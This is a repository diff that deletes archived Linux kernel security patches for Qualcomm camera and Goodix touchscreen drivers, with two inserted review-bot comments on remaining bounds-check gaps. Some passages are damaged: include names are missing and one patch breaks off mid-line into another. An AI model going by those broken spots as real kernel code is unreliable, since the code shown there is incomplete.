-diff --git a/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c b/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c
-index 6ac4a5e..4a81fa6 100644
---- a/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c
-+++ b/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c
-@@ -22,6 +22,7 @@
- #include "msm_jpeg_platform.h"
- #include "msm_jpeg_common.h"
-
-+#define UINT32_MAX (4294967295U)
- static int release_buf;
-
- inline void msm_jpeg_q_init(char const *name, struct msm_jpeg_q *q_p)
-@@ -631,7 +632,7 @@ int msm_jpeg_ioctl_hw_cmds(struct msm_jpeg_device *pgmn_dev,
- void * __user arg)
- {
- int is_copy_to_user;
-- int len;
-+ uint32_t len;
- uint32_t m;
- struct msm_jpeg_hw_cmds *hw_cmds_p;
- struct msm_jpeg_hw_cmd *hw_cmd_p;
-@@ -640,7 +641,12 @@ int msm_jpeg_ioctl_hw_cmds(struct msm_jpeg_device *pgmn_dev,
- JPEG_PR_ERR("%s:%d] failed\n", __func__, __LINE__);
- return -EFAULT;
- }
--
-+ if ((m == 0) || (m > ((UINT32_MAX-sizeof(struct msm_jpeg_hw_cmds))/
-+ sizeof(struct msm_jpeg_hw_cmd)))) {
-+ JPEG_PR_ERR("%s:%d] outof range of hwcmds\n",
-+ __func__, __LINE__);
-+ return -EINVAL;
-+ }
- len = sizeof(struct msm_jpeg_hw_cmds) +
- sizeof(struct msm_jpeg_hw_cmd) * (m - 1);
- hw_cmds_p = kmalloc(len, GFP_KERNEL);
-diff --git a/drivers/media/video/msm/mercury/msm_mercury_sync.c b/drivers/media/video/msm/mercury/msm_mercury_sync.c
-index 9293aad..fe74a0a 100644
---- a/drivers/media/video/msm/mercury/msm_mercury_sync.c
-+++ b/drivers/media/video/msm/mercury/msm_mercury_sync.c
-@@ -24,6 +24,7 @@
- #include "msm_mercury_macros.h"
- #include "msm_mercury_hw_reg.h"
-
-+#define UINT32_MAX (4294967295U)
- static struct msm_mercury_core_buf out_buf_local;
- static struct msm_mercury_core_buf in_buf_local;
-
-@@ -470,7 +471,7 @@ int msm_mercury_ioctl_hw_cmds(struct msm_mercury_device *pmercury_dev,
- void * __user arg)
- {
- int is_copy_to_user;
-- int len;
-+ uint32_t len;
- uint32_t m;
- struct msm_mercury_hw_cmds *hw_cmds_p;
- struct msm_mercury_hw_cmd *hw_cmd_p;
-@@ -479,7 +480,12 @@ int msm_mercury_ioctl_hw_cmds(struct msm_mercury_device *pmercury_dev,
- MCR_PR_ERR("%s:%d] failed\n", __func__, __LINE__);
- return -EFAULT;
- }
--
-+ if ((m == 0) || (m > ((UINT32_MAX-sizeof(struct msm_mercury_hw_cmds))/
-+ sizeof(struct msm_mercury_hw_cmd)))) {
-+ MCR_PR_ERR("%s:%d] outof range of hwcmds\n",
-+ __func__, __LINE__);
-+ return -EINVAL;
-+ }
- len = sizeof(struct msm_mercury_hw_cmds) +
- sizeof(struct msm_mercury_hw_cmd) * (m - 1);
- hw_cmds_p = kmalloc(len, GFP_KERNEL);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2013-4736/ANY/0003.patch
deleted file mode 100644
index 362d13b0..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0003.patch
+++ /dev/null
@@ -1,101 +0,0 @@ -From 81947189009afcfac17d1106101260c660421265 Mon Sep 17 00:00:00 2001 -From: Monika Alekhya -Date: Tue, 11 Jun 2013 19:32:27 +0530 -Subject: msm:camera: Fix signedness issue in hw_exec_cmds - - In hw_exec_cmds()second argument m_cmds should be - of type unsigned interger - -Change-Id: Idad2eb1a59481f3fe9f90221ff2061e8dae57013 -CRs-Fixed: 493314 -Signed-off-by: Monika Alekhya ---- - drivers/media/video/msm/gemini/msm_gemini_hw.c | 2 +- - drivers/media/video/msm/gemini/msm_gemini_hw.h | 2 +- - drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c | 2 +- - drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h | 2 +- - drivers/media/video/msm/mercury/msm_mercury_hw.c | 2 +- - drivers/media/video/msm/mercury/msm_mercury_hw.h | 2 +- - 6 files changed, 6 insertions(+), 6 deletions(-) - -diff --git a/drivers/media/video/msm/gemini/msm_gemini_hw.c b/drivers/media/video/msm/gemini/msm_gemini_hw.c -index 116edcf..99b76be 100644 ---- a/drivers/media/video/msm/gemini/msm_gemini_hw.c -+++ b/drivers/media/video/msm/gemini/msm_gemini_hw.c -@@ -432,7 +432,7 @@ void msm_gemini_hw_delay(struct msm_gemini_hw_cmd *hw_cmd_p, int m_us) - } - } - --int msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, int m_cmds) -+int msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, uint32_t m_cmds) - { - int is_copy_to_user = -1; - uint32_t data; -diff --git a/drivers/media/video/msm/gemini/msm_gemini_hw.h b/drivers/media/video/msm/gemini/msm_gemini_hw.h -index 0abd4c4..23d31ef 100644 ---- a/drivers/media/video/msm/gemini/msm_gemini_hw.h -+++ b/drivers/media/video/msm/gemini/msm_gemini_hw.h -@@ -94,7 +94,7 @@ uint32_t msm_gemini_hw_read(struct msm_gemini_hw_cmd *hw_cmd_p); - void msm_gemini_hw_write(struct msm_gemini_hw_cmd *hw_cmd_p); - int msm_gemini_hw_wait(struct msm_gemini_hw_cmd *hw_cmd_p, int m_us); - void msm_gemini_hw_delay(struct msm_gemini_hw_cmd *hw_cmd_p, int m_us); --int msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, int m_cmds); -+int 
msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, uint32_t m_cmds); - void msm_gemini_hw_region_dump(int size); - void msm_gemini_io_dump(int size); - -diff --git a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c -index 0bfb6a8..d92caab 100644 ---- a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c -+++ b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c -@@ -295,7 +295,7 @@ void msm_jpeg_hw_delay(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_us) - } - } - --int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_cmds) -+int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, uint32_t m_cmds) - { - int is_copy_to_user = -1; - uint32_t data; -diff --git a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h -index 73a0e27..5545115 100644 ---- a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h -+++ b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h -@@ -94,7 +94,7 @@ uint32_t msm_jpeg_hw_read(struct msm_jpeg_hw_cmd *hw_cmd_p); - void msm_jpeg_hw_write(struct msm_jpeg_hw_cmd *hw_cmd_p); - int msm_jpeg_hw_wait(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_us); - void msm_jpeg_hw_delay(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_us); --int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_cmds); -+int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, uint32_t m_cmds); - void msm_jpeg_hw_region_dump(int size); - void msm_jpeg_io_dump(int size); - -diff --git a/drivers/media/video/msm/mercury/msm_mercury_hw.c b/drivers/media/video/msm/mercury/msm_mercury_hw.c -index 244c038..a940dd6 100644 ---- a/drivers/media/video/msm/mercury/msm_mercury_hw.c -+++ b/drivers/media/video/msm/mercury/msm_mercury_hw.c -@@ -263,7 +263,7 @@ void msm_mercury_hw_delay(struct msm_mercury_hw_cmd *hw_cmd_p, int m_us) - } - } - --int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, int m_cmds) -+int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, uint32_t m_cmds) - { - int 
is_copy_to_user = -1; - uint32_t data; -diff --git a/drivers/media/video/msm/mercury/msm_mercury_hw.h b/drivers/media/video/msm/mercury/msm_mercury_hw.h -index 54fc818..f69d8ba 100644 ---- a/drivers/media/video/msm/mercury/msm_mercury_hw.h -+++ b/drivers/media/video/msm/mercury/msm_mercury_hw.h -@@ -55,7 +55,7 @@ uint32_t msm_mercury_hw_read(struct msm_mercury_hw_cmd *hw_cmd_p); - void msm_mercury_hw_write(struct msm_mercury_hw_cmd *hw_cmd_p); - int msm_mercury_hw_wait(struct msm_mercury_hw_cmd *hw_cmd_p, int m_us); - void msm_mercury_hw_delay(struct msm_mercury_hw_cmd *hw_cmd_p, int m_us); --int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, int m_cmds); -+int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, uint32_t m_cmds); - void msm_mercury_hw_region_dump(int size); - - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2013-4737/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-4737/ANY/0001.patch deleted file mode 100644 index 4b680b63..00000000 --- a/Patches/Linux_CVEs/CVE-2013-4737/ANY/0001.patch +++ /dev/null 
@@ -1,150 +0,0 @@ -From 4256415b296348ff16cd17a5b8f8dce4dea37328 Mon Sep 17 00:00:00 2001 -From: Larry Bassel -Date: Mon, 29 Jul 2013 13:43:17 -0700 -Subject: msm: Make CONFIG_STRICT_MEMORY_RWX even stricter - -If CONFIG_STRICT_MEMORY_RWX was set, the first section (containing -the kernel page table and the initial code) and the section -containing the init code were both given RWX permission, which is -a potential security hole. - -Pad the first section after the initial code (which will never -be executed when the MMU is on) to make the rest of the kernel -text start in the second section and make the first section RW. - -Move some data which had ended up in the "init text" -section into the "init data" one, as this is RW, not RX. -Make the "init text" RX. - -We will not free the section containing the "init text", -because if we do, the kernel will allocate memory for RW data there. - -Change-Id: I6ca5f4e07342c374246f04a3fee18042fd47c33b -CRs-fixed: 513919 -Signed-off-by: Larry Bassel ---- - arch/arm/kernel/vmlinux.lds.S | 12 +++++++----- - arch/arm/mm/init.c | 9 +++++++++ - arch/arm/mm/mmu.c | 15 +++++++-------- - 3 files changed, 23 insertions(+), 13 deletions(-) - -diff --git a/arch/arm/kernel/vmlinux.lds.S b/arch/arm/kernel/vmlinux.lds.S -index ae59e5a..0bf55ae 100644 ---- a/arch/arm/kernel/vmlinux.lds.S -+++ b/arch/arm/kernel/vmlinux.lds.S -@@ -93,6 +93,9 @@ SECTIONS - _text = .; - HEAD_TEXT - } -+#ifdef CONFIG_STRICT_MEMORY_RWX -+ . = ALIGN(1< -Date: Fri, 9 Aug 2013 11:21:50 -0700 -Subject: msm: camera: Bound check length for Dequeue stream buff info - -Bound check the length param from user space given to -copy_from_user function to avoid any invalid memory access. 
- -Change-Id: I926509a5fffd49cfc0130d182f246fbb9335b60e -CRs-Fixed: 519124 -Signed-off-by: Hariram Purushothaman ---- - drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c | 5 +++++ - 1 file changed, 5 insertions(+) - -diff --git a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c -index d302131..3aaff78 100644 ---- a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c -+++ b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c -@@ -1323,6 +1323,11 @@ static long msm_vpe_subdev_ioctl(struct v4l2_subdev *sd, - struct msm_vpe_buff_queue_info_t *buff_queue_info; - - VPE_DBG("VIDIOC_MSM_VPE_DEQUEUE_STREAM_BUFF_INFO\n"); -+ if (ioctl_ptr->len != sizeof(uint32_t)) { -+ pr_err("%s:%d Invalid len\n", __func__, __LINE__); -+ mutex_unlock(&vpe_dev->mutex); -+ return -EINVAL; -+ } - - rc = (copy_from_user(&identity, - (void __user *)ioctl_ptr->ioctl_ptr, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2013-4738/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-4738/ANY/0002.patch deleted file mode 100644 index 239a2fce..00000000 --- a/Patches/Linux_CVEs/CVE-2013-4738/ANY/0002.patch +++ /dev/null 
@@ -1,33 +0,0 @@
-From 28385b9c3054c91dca1aa194ffa750550c50f3ce Mon Sep 17 00:00:00 2001
-From: Seemanta Dutta
-Date: Fri, 26 Jul 2013 13:39:05 -0700
-Subject: msm: camera: Add lower and upper bounds check in msm_cpp.c ioctl()
-
-Add a check for upper and lower bounds in msm_cpp_subdev_ioctl() for
-command code VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO.
-
-CRs-fixed: 518731
-Change-Id: I72996e13b7370a3b49f645297c52a118775b2b12
-Signed-off-by: Seemanta Dutta
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 822c0c8..8c8570d 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -1536,6 +1536,10 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- uint32_t identity;
- struct msm_cpp_buff_queue_info_t *buff_queue_info;
-
-+ if ((ioctl_ptr->len == 0) ||
-+ (ioctl_ptr->len > sizeof(uint32_t)))
-+ return -EINVAL;
-+
- rc = (copy_from_user(&identity,
- (void __user *)ioctl_ptr->ioctl_ptr,
- ioctl_ptr->len) ? -EFAULT : 0);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4739/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-4739/ANY/0001.patch
deleted file mode 100644
index 66d65e80..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4739/ANY/0001.patch
+++ /dev/null
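Review bot: The length check added in `msm_cpp_subdev_ioctl()` ahead of the `copy_from_user(&identity, ...)` call still accepts lengths of 1 to 3 bytes, so only part of `identity` is filled from user space and the remaining bytes keep whatever the stack held, since the context line declares `uint32_t identity;` without an initializer. Requiring the exact size closes that gap: `if (ioctl_ptr->len != sizeof(uint32_t)) return -EINVAL;`, which is the form the `msm_vpe.c` patch earlier on this page uses for the same ioctl pattern. The enclosing function starts and ends outside the hunk, so how `identity` is consumed afterwards cannot be confirmed from here.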
@@ -1,50 +0,0 @@
-From 8604847927f952cc8e773b97eca24e1060a570f2 Mon Sep 17 00:00:00 2001
-From: Seemanta Dutta
-Date: Thu, 25 Jul 2013 18:01:32 -0700
-Subject: msm: camera: Fix uninitialized memory returned to userspace
-
-Local structures have not been initialized to all zeroes, so fix
-this by setting them to all zeroes to prevent uninitialized memory
-being copied to userspace.
-
-CRs-fixed: 518478
-Change-Id: I6e76355c3f854514def1bd18dcc5c3ef6db38f16
-Signed-off-by: Seemanta Dutta
----
- drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c | 3 ++-
- drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c | 1 +
- 2 files changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c b/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c
-index 9293aad..e6483c1 100644
---- a/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c
-+++ b/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2013, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -196,6 +196,7 @@ int msm_mercury_evt_get(struct msm_mercury_device *pmercury_dev,
- int rc = 0;
-
- MCR_DBG("(%d)%s() Enter\n", __LINE__, __func__);
-+ memset(&ctrl_cmd, 0, sizeof(ctrl_cmd));
- ctrl_cmd.type = (uint32_t)msm_mercury_q_wait(&pmercury_dev->evt_q);
-
- rc = copy_to_user(arg, &ctrl_cmd, sizeof(ctrl_cmd));
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-index aa6f034..debbf03 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-@@ -221,6 +221,7 @@ int msm_jpeg_evt_get(struct msm_jpeg_device *pgmn_dev,
- return -EAGAIN;
- }
-
-+ memset(&ctrl_cmd, 0, sizeof(ctrl_cmd));
- ctrl_cmd.type = buf_p->vbuf.type;
- kfree(buf_p);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4740/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-4740/ANY/0001.patch
deleted file mode 100644
index 39e3ca4e..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4740/ANY/0001.patch
+++ /dev/null
@@ -1,300 +0,0 @@ -From f53bcf29a6e7a66b3d935b8d562fa00829261f05 Mon Sep 17 00:00:00 2001 -From: Bingzhe Cai -Date: Tue, 24 Sep 2013 01:42:12 +0800 -Subject: input: touchpanel: fix security issues in GT915 driver - -There are multiple buffer overflow and input validation issues -in Goodix gt915 driver, fix these issues by adding data length -check and change file system node mode. - -CRs-Fixed: 526101 -Change-Id: I5173fc1ca021fd45c939c7c8a4f460651330de5b -Signed-off-by: Bingzhe Cai ---- - drivers/input/touchscreen/gt9xx/goodix_tool.c | 110 +++++++++++++++++++------- - 1 file changed, 83 insertions(+), 27 deletions(-) - -diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c -index bdac3fd..aa8159f 100644 ---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c -+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c -@@ -22,6 +22,7 @@ - */ - - #include "gt9xx.h" -+#include - - #define DATA_LENGTH_UINT 512 - #define CMD_HEAD_LENGTH (sizeof(st_cmd_head) - sizeof(u8 *)) -@@ -53,6 +54,8 @@ static struct i2c_client *gt_client; - - static struct proc_dir_entry *goodix_proc_entry; - -+static struct mutex lock; -+ - static s32 goodix_tool_write(struct file *filp, const char __user *buff, - unsigned long len, void *data); - static s32 goodix_tool_read(char *page, char **start, off_t off, int count, -@@ -188,7 +191,7 @@ static void unregister_i2c_func(void) - - s32 init_wr_node(struct i2c_client *client) - { -- s32 i; -+ u8 i; - - gt_client = client; - memset(&cmd_head, 0, sizeof(cmd_head)); -@@ -202,8 +205,8 @@ s32 init_wr_node(struct i2c_client *client) - i--; - } - if (i) { -- DATA_LENGTH = i * DATA_LENGTH_UINT + GTP_ADDR_LENGTH; -- GTP_INFO("Applied memory size:%d.", DATA_LENGTH); -+ DATA_LENGTH = i * DATA_LENGTH_UINT; -+ dev_dbg(&client->dev, "Applied memory size:%d.", DATA_LENGTH); - } else { - GTP_ERROR("Apply for memory failed."); - return FAIL; -@@ -214,8 +217,9 @@ s32 init_wr_node(struct i2c_client *client) - - 
register_i2c_func(); - -+ mutex_init(&lock); - tool_set_proc_name(procname); -- goodix_proc_entry = create_proc_entry(procname, 0666, NULL); -+ goodix_proc_entry = create_proc_entry(procname, 0660, NULL); - if (goodix_proc_entry == NULL) { - GTP_ERROR("Couldn't create proc entry!"); - return FAIL; -@@ -334,9 +338,13 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - GTP_DEBUG_FUNC(); - GTP_DEBUG_ARRAY((u8 *)buff, len); - -+ mutex_lock(&lock); - ret = copy_from_user(&cmd_head, buff, CMD_HEAD_LENGTH); -- if (ret) -+ if (ret) { - GTP_ERROR("copy_from_user failed."); -+ ret = -EACCES; -+ goto exit; -+ } - - GTP_DEBUG("wr :0x%02x.", cmd_head.wr); - GTP_DEBUG("flag:0x%02x.", cmd_head.flag); -@@ -354,6 +362,19 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - GTP_DEBUG("len:%d.", (s32)len); - GTP_DEBUG("buf[20]:0x%02x.", buff[CMD_HEAD_LENGTH]); - -+ if (cmd_head.data_len > (DATA_LENGTH - GTP_ADDR_LENGTH)) { -+ pr_err("data len %d > data buff %d, rejected!\n", -+ cmd_head.data_len, (DATA_LENGTH - GTP_ADDR_LENGTH)); -+ ret = -EINVAL; -+ goto exit; -+ } -+ if (cmd_head.addr_len > GTP_ADDR_LENGTH) { -+ pr_err(" addr len %d > data buff %d, rejected!\n", -+ cmd_head.addr_len, GTP_ADDR_LENGTH); -+ ret = -EINVAL; -+ goto exit; -+ } -+ - if (cmd_head.wr == 1) { - /* copy_from_user(&cmd_head.data[cmd_head.addr_len], - &buff[CMD_HEAD_LENGTH], cmd_head.data_len); */ -@@ -373,7 +394,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - if (cmd_head.flag == 1) { - if (FAIL == comfirm()) { - GTP_ERROR("[WRITE]Comfirm fail!"); -- return FAIL; -+ ret = -EINVAL; -+ goto exit; - } - } else if (cmd_head.flag == 2) { - /* Need interrupt! 
*/ -@@ -382,7 +404,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - &cmd_head.data[GTP_ADDR_LENGTH - cmd_head.addr_len], - cmd_head.data_len + cmd_head.addr_len) <= 0) { - GTP_ERROR("[WRITE]Write data failed!"); -- return FAIL; -+ ret = -EIO; -+ goto exit; - } - - GTP_DEBUG_ARRAY( -@@ -391,7 +414,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - if (cmd_head.delay) - msleep(cmd_head.delay); - -- return cmd_head.data_len + CMD_HEAD_LENGTH; -+ ret = cmd_head.data_len + CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 3) { /* Write ic type */ - - ret = copy_from_user(&cmd_head.data[0], &buff[CMD_HEAD_LENGTH], -@@ -399,30 +423,40 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - if (ret) - GTP_ERROR("copy_from_user failed."); - -+ if (cmd_head.data_len > sizeof(IC_TYPE)) { -+ pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n", -+ cmd_head.data_len, sizeof(IC_TYPE)); -+ ret = -EINVAL; -+ goto exit; -+ } - memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len); - - register_i2c_func(); - -- return cmd_head.data_len + CMD_HEAD_LENGTH; -- } else if (cmd_head.wr == 3) { -+ ret = cmd_head.data_len + CMD_HEAD_LENGTH; -+ goto exit; -+ } else if (cmd_head.wr == 5) { - - /* memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len); */ - -- return cmd_head.data_len + CMD_HEAD_LENGTH; -+ ret = cmd_head.data_len + CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 7) { /* disable irq! */ - gtp_irq_disable(i2c_get_clientdata(gt_client)); - - #if GTP_ESD_PROTECT - gtp_esd_switch(gt_client, SWITCH_OFF); - #endif -- return CMD_HEAD_LENGTH; -+ ret = CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 9) { /* enable irq! 
*/ - gtp_irq_enable(i2c_get_clientdata(gt_client)); - - #if GTP_ESD_PROTECT - gtp_esd_switch(gt_client, SWITCH_ON); - #endif -- return CMD_HEAD_LENGTH; -+ ret = CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 17) { - struct goodix_ts_data *ts = i2c_get_clientdata(gt_client); - ret = copy_from_user(&cmd_head.data[GTP_ADDR_LENGTH], -@@ -436,27 +470,41 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - ts->gtp_rawdiff_mode = false; - GTP_DEBUG("gtp leave rawdiff."); - } -- return CMD_HEAD_LENGTH; -+ ret = CMD_HEAD_LENGTH; -+ goto exit; - } - #ifdef UPDATE_FUNCTIONS - else if (cmd_head.wr == 11) { /* Enter update mode! */ -- if (FAIL == gup_enter_update_mode(gt_client)) -- return FAIL; -+ if (FAIL == gup_enter_update_mode(gt_client)) { -+ ret = -EBUSY; -+ goto exit; -+ } - } else if (cmd_head.wr == 13) { /* Leave update mode! */ - gup_leave_update_mode(); - } else if (cmd_head.wr == 15) { /* Update firmware! */ - show_len = 0; - total_len = 0; -+ if (cmd_head.data_len + 1 > DATA_LENGTH) { -+ pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n", -+ cmd_head.data_len + 1, DATA_LENGTH); -+ ret = -EINVAL; -+ goto exit; -+ } - memset(cmd_head.data, 0, cmd_head.data_len + 1); - memcpy(cmd_head.data, &buff[CMD_HEAD_LENGTH], - cmd_head.data_len); - -- if (FAIL == gup_update_proc((void *)cmd_head.data)) -- return FAIL; -+ if (FAIL == gup_update_proc((void *)cmd_head.data)) { -+ ret = -EBUSY; -+ goto exit; -+ } - } - #endif -+ ret = CMD_HEAD_LENGTH; - -- return CMD_HEAD_LENGTH; -+exit: -+ mutex_unlock(&lock); -+ return ret; - } - - /******************************************************* -@@ -470,10 +518,14 @@ Output: - static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - int *eof, void *data) - { -+ s32 ret; - GTP_DEBUG_FUNC(); - -+ mutex_lock(&lock); - if (cmd_head.wr % 2) { -- return FAIL; -+ pr_err("<< [READ]command head wrong\n"); -+ ret = -EINVAL; -+ goto exit; - } else if (!cmd_head.wr) { - u16 len = 0; 
- s16 data_len = 0; -@@ -482,7 +534,8 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - if (cmd_head.flag == 1) { - if (FAIL == comfirm()) { - GTP_ERROR("[READ]Comfirm fail!"); -- return FAIL; -+ ret = -EINVAL; -+ goto exit; - } - } else if (cmd_head.flag == 2) { - /* Need interrupt! */ -@@ -505,11 +558,12 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - else - len = data_len; - -- data_len -= DATA_LENGTH; -+ data_len -= len; - - if (tool_i2c_read(cmd_head.data, len) <= 0) { - GTP_ERROR("[READ]Read data failed!"); -- return FAIL; -+ ret = -EINVAL; -+ goto exit; - } - memcpy(&page[loc], &cmd_head.data[GTP_ADDR_LENGTH], - len); -@@ -525,15 +579,14 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - - GTP_DEBUG("Return ic type:%s len:%d.", page, - (s32)cmd_head.data_len); -- return cmd_head.data_len; -+ ret = cmd_head.data_len; -+ goto exit; - /* return sizeof(IC_TYPE_NAME); */ - } else if (cmd_head.wr == 4) { - page[0] = show_len >> 8; - page[1] = show_len & 0xff; - page[2] = total_len >> 8; - page[3] = total_len & 0xff; -- -- return cmd_head.data_len; - } else if (6 == cmd_head.wr) { - /* Read error code! */ - } else if (8 == cmd_head.wr) { /*Read driver version */ -@@ -544,6 +597,9 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - memcpy(page, GTP_DRIVER_VERSION, tmp_len); - page[tmp_len] = 0; - } -+ ret = cmd_head.data_len; - -- return cmd_head.data_len; -+exit: -+ mutex_unlock(&lock); -+ return ret; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2013-6122/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-6122/ANY/0001.patch deleted file mode 100644 index 39e3ca4e..00000000 --- a/Patches/Linux_CVEs/CVE-2013-6122/ANY/0001.patch +++ /dev/null 
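Review bot: In the firmware-update branch (`cmd_head.wr == 15`) of `goodix_tool_write()`, the new `data_len + 1 > DATA_LENGTH` check bounds the destination, but the context line after it still reads the `__user` pointer `buff` with a plain `memcpy`, unlike the other branches that go through `copy_from_user`. That line should become `if (copy_from_user(cmd_head.data, &buff[CMD_HEAD_LENGTH], cmd_head.data_len)) { ret = -EFAULT; goto exit; }` so that a bad user address fails cleanly instead of faulting inside the kernel. The `GTP_DEBUG("buf[20]:0x%02x.", buff[CMD_HEAD_LENGTH])` context line dereferences `buff` directly in the same way. In the `wr == 3` branch the `copy_from_user` result is only logged, so execution continues to the `memcpy` into `IC_TYPE` with whatever `cmd_head.data` already held. The identical patch text recorded under CVE-2013-6122 further down the page carries the same points.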
@@ -1,300 +0,0 @@ -From f53bcf29a6e7a66b3d935b8d562fa00829261f05 Mon Sep 17 00:00:00 2001 -From: Bingzhe Cai -Date: Tue, 24 Sep 2013 01:42:12 +0800 -Subject: input: touchpanel: fix security issues in GT915 driver - -There are multiple buffer overflow and input validation issues -in Goodix gt915 driver, fix these issues by adding data length -check and change file system node mode. - -CRs-Fixed: 526101 -Change-Id: I5173fc1ca021fd45c939c7c8a4f460651330de5b -Signed-off-by: Bingzhe Cai ---- - drivers/input/touchscreen/gt9xx/goodix_tool.c | 110 +++++++++++++++++++------- - 1 file changed, 83 insertions(+), 27 deletions(-) - -diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c -index bdac3fd..aa8159f 100644 ---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c -+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c -@@ -22,6 +22,7 @@ - */ - - #include "gt9xx.h" -+#include - - #define DATA_LENGTH_UINT 512 - #define CMD_HEAD_LENGTH (sizeof(st_cmd_head) - sizeof(u8 *)) 